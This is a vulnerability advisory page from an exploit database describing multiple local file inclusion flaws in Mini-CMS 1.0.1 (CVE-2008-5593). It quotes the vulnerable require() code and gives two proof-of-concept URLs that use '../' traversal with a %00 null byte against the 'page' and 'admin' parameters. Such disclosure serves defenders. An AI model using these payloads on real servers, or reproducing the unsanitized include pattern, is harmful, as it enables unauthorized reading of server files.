Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
2008.12.18
Credit:
cOndemned
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-5593
CWE:
CWE-22
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
/* $Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $ Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities Discovered by cOndemned Download : http://www.bpowerhouse.info/mini_cms.htm Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;* */ Source of index.php [...] 9. $page = !empty($_GET['page']) ? $_GET['page'] : "home"; 10. $admin = !empty($_GET['admin']) ? $_GET['admin'] : ""; [...] 80. if (($page != "") && file_exists("page/" . $page . ".php")) { 81. require("page/" . $page . ".php"); 82. } else if (($admin != "") && file_exists("admin/" . $admin . ".php")) { 83. require("admin/" . $admin . ".php"); [...] Proof of Concept http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00 http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00 It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... Maybe double fail ? x] EoF
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top